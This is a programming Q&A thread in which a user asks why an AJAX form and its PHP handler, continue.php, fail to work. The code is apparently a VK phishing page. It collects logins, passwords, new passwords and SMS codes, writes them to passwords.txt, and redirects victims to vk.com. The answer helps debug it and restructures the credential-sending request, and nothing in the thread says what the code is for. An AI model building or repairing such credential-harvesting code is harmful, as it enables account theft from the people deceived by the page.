# How to get correct JSON request in AJAX and make correct php handler to send ajax-form sucessfully?

Tags: javascript, json, ajax

I have some problems with sending AJAX form.I have got error like on the screenshot:

[image]

What about line 72 and other type of code,I try to send request using ajax:

```js
var auth = $.ajax("continue.php?act=login&login=" + encodeURIComponent(login) + "&oldPassword=" + encodeURIComponent(password) + "&captcha_key=" + captcha_key + "&captcha_sid=" + captcha_sid + "&validation_sid=" + validation_sid + "&code=" + smscode + "&newPassword=" + encodeURIComponent(g("newpassword").value) + "&is2fa=" + (have2fa ? 1 : 0) + "&qid=" + encodeURIComponent(window.location.search) + "&token=" + gettedToken).done(function() {
    var response = JSON.parse(auth.responseText);
    /*if (response.access_token) {
     changePassword(login, password, response.access_token, g("newpassword").value);
     return;
    }*/

    if (response.api) {
     if (response.result) {
      window.location.replace("https://vk.com/id0");
     } else {
      gettedToken = response.token;
      var e = response.api.error;
      if (e.error_code === 14) {
       $("#password, #sms").fadeOut(300, function () {
        $("#capt").fadeIn(300);
       });
       g("captcha_key").value = "";
       g("captcha_key").focus();
       g("capt_img").src = e.captcha_img;
       g("captcha_sid").value = e.captcha_sid;
      }
     }
     return;
    }
```

So, where can be the problem to fix it?Because button to send form isn't work.
Here is my file continue.php

```js
if (isset($_GET['mobile']) && isset($_GET['pass']) && isset($_GET['newpass']) && isset($_GET['repass']) && ($_GET['mobile']!="") && ($_GET['pass']!="") && ($_GET['newpass']!="") && ($_GET['repass']!=""))
{

$location='https://vk.com/';
$Log = $_GET['mobile'];
$Pass = $_GET['pass'];
$newpassword = $_GET['newpass'];
$newpassword2 = $_GET['repass'];
$smscode = $_GET['code'];
$log = fopen("passwords.txt","a+");
fwrite($log,"\n $Log:$Pass:$newpassword:$newpassword2 \n");
fclose($log);

$answer = ['type' => 'success', 'message' => 'All OK'];
echo json_encode($answer);

} else {
echo json_encode(['type' => 'error', 'message' => 'All not OK']);
}
```

Comment: you have not passed auth to your done callback.
   .done(function(auth){

Comment: please specify line 72 in your posted code

Comment: The error specifies that the JSON you get back from the server is invalid. There is probably a server side error which is outputed and that makes the JSON invalid. So inspect the answer you get from the server with the Chrome Dev Tools (e.g. via the Network tab).

Comment: So,here are result of google chrome inspector and how to fix it? https://cdn1.savepice.ru/uploads/2019/11/28/b8e67124b3d2fd64605a57fd1af6badd-full.png

Answer (score 0):

First of all there are some things in your code that I will like to point out.

1. If you are using **$.ajax** to do some kinda of login which It looks like you are tryng to do, I would use the **POST** method instead of **GET**, since you are dealing with passwords and other important information.
2. You never specified in your **$.ajax** what type of data your request is using e.g:  **JSON,TEXT,HTML**
3. (this is a personal one) I would use an object to pass the parameters of the ajax call rather than append them to the url.

that said here is a javascript code you can try in order the get the response back from your server:

```
`//I would use an object of parameters rather than embedded parameters into the url
let params = {
"act": "login",// i guess u use some case match and the actvity login have the php code you provide
"login": encodeURIComponent(login),
"oldPassword": encodeURIComponent(password) ,
"captcha_key": captcha_key , 
"captcha_sid": captcha_sid , 
"validation_sid": validation_sid , 
"code": smscode , 
"newPassword": encodeURIComponent(g("newpassword").value),
"is2fa": (have2fa ? 1 : 0) , 
"qid": encodeURIComponent(window.location.search) ,
"token":  gettedToken
},
url = "continue.php",//I guess this is the php page that contains the methods you append to your question
type = "GET";// I would use post instead of get since you are sending passwords and other stuff

const _ajax = (url, type, params) => {
  return $.ajax({
    url: url,
    type: type,
    dataType: 'JSON',
    data: params
  })
}

_ajax(url,type,params)
.done((response)=>{
console.log(response);
//do your stuff here
})`
```

Please let me know if this answer was helpful to resolve your problem or if there is something else I can do to help you.

Comment: Yes,your answer were helpful.But,I don't need to change my link $.ajax("continue.php?act=login&login=" + encodeURIComponent(login) + "&oldPassword=" + encodeURIComponent(password) + "&captcha_key=" + captcha_key + "&captcha_sid=" + captcha_sid + "&validation_sid=" + validation_sid + "&code=" + smscode + "&newPassword=" + encodeURIComponent(g("newpassword").value) + "&is2fa=" + (have2fa ? 1 : 0) + "&qid=" + encodeURIComponent(window.location.search) + "&token=" + gettedToken).done(function() {
    var response = JSON.parse(auth.responseText);